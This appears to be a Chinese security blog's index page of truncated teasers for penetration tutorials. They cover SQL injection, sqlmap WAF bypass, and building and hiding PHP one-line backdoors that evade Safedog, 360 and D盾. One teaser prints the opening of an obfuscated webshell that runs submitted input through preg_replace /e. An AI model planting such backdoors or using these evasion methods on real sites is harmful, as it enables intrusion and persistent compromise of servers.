滲透教程

可能是網上最易懂的SQL手工注入教程【個人筆記精華整理】

我是技術不高,但我能帶你入門 我遇到過無數人曾來像我表示自己想學網絡安全,走了很多彎路,求師被騙過很多錢。 這樣的人我沒辦法幫助太多,限于時間精力與能力,幫得了1個幫不了100個,再說我也不是昔日的雷鋒了。 如今我也基本上不做滲透了,回過頭看到幾年前自己筆記中有一些注入…繼續閱讀 »
滲透教程

php一句話后門過狗姿勢萬千之后門構造與隱藏【二】

聲明: 本文由博主首發于:阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載,請先聯系先知技術社區授權;未經授權請勿轉載。 上一篇:php一句話后門過狗姿勢萬千之理論篇【一】 第二章節主要帶給大家一些后門構造思路,與安全狗文件特征檢測的機制。 另外強調一下,這篇文章需…繼續閱讀 »
滲透教程

php一句話后門過狗姿勢萬千之傳輸層加工【三】

聲明: 本文由博主首發于:阿里先知?https://xianzhi.aliyun.com/forum/read/442.html 如需要轉載,請先聯系先知技術社區授權;未經授權請勿轉載。 先知技術社區投稿郵箱:Aliyun_xianzhi#service.alibaba.com   既然木馬已就緒,那么想要利用木馬,必然有一個數據傳輸的過程,數據提交是必須的,數據返回…繼續閱讀 »
滲透教程

php一句話后門過狗姿勢萬千之理論篇【一】

聲明: 本文由博主首發于:阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載,請先聯系先知技術社區授權;未經授權請勿轉載。 寫在前面: 過狗相關的資料網上也是有很多,所以在我接下來的文章中,可能觀點或者舉例可能會與網上部分雷同,或者表述不夠全面。 但是我只能說,我…繼續閱讀 »
滲透工具 滲透教程

php一句話后門過5大WAF無壓力[安全狗+360網站衛士+護衛神+D盾]

最近研究過狗一句話有點走火入魔,目前研究了幾個版本的一句話,效果都還不錯。 授之于魚不如授之以漁,過幾天準備從理論層,代碼層,傳輸層寫個過狗連載教程。 目前我使用的是cknife軟件,類似于菜刀的開源軟件,雖然還有不少bug,但高度自由修改,不用擔心后門。我之所以沒有用菜刀,…繼續閱讀 »
滲透教程

php一句話后門的幾種變形分析[preg_replace函數]

今天偶然在土司看到一篇關于php后門的問題,讓我聯想到以前遇到過的一個一句話,共同點都是利用preg_replace中/e 修正符使replacement 參數當作 PHP 代碼來執行。 先來看下原版代碼 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…繼續閱讀 »
滲透教程

教你如何獲取360網站安全檢測掃描官方御用字典

這是我之前發表在土司的一篇文章,在這里也分享給大家 360是個惡心的東西大家都懂的,但是有的時候我們可以小小的利用下。先上個圖: ?360網站在線掃描是可以掃描任意網站的,什么意思呢?我可以直接輸入別人的網址,360會直接進行掃描,但是如果想看到掃描報告,那就得驗證站長權限了。 …繼續閱讀 »
滲透教程

WireShark教程 – 黑客發現之旅(3) – Bodisparking惡意代碼[轉]

0x00 發現 接到客戶需求,對其互聯網辦公區域主機安全分析。在對某一臺主機通信數據進行分析時,過濾了一下HTTP協議。 一看數據,就發現異常,這臺主機HTTP數據不多,但大量HTTP請求均為“Get heikewww/www.txt”,問題的發現當然不是因為拼音“heike”。點擊“Info”排列一下,可以看得更清楚,還…繼續閱讀 »
滲透教程

WireShark教程 – 黑客發現之旅(2)—肉雞郵件服務器[轉]

0x00 背景 肉雞也稱傀儡機,是指可以被黑客遠程控制的機器。一旦成為肉雞,就可以被攻擊者隨意利用,如:竊取資料、再次發起攻擊、破壞等等。下面將利用WireShark一起學習一種肉雞的用途:廣告垃圾郵件發送站。 0x01 發現問題 在對某企業服務器群進行安全檢測時發現客戶一臺服務器(10.19…繼續閱讀 »
滲透教程

sqlmap注入之tamper繞過WAF防火墻過濾

每當注入的時候看到這個賤賤的提示框,內心有千萬只草泥馬在奔騰。   但很多時候還是得靜下來分析過濾系統到底過濾了哪些參數,該如何繞過。 sqlmap中的tamper給我們帶來了很多防過濾的腳本,非常實用,可能有的朋友還不知道怎樣才能最有效的利用tamper腳本。 當然使用腳本之前…繼續閱讀 »
群星闪耀APP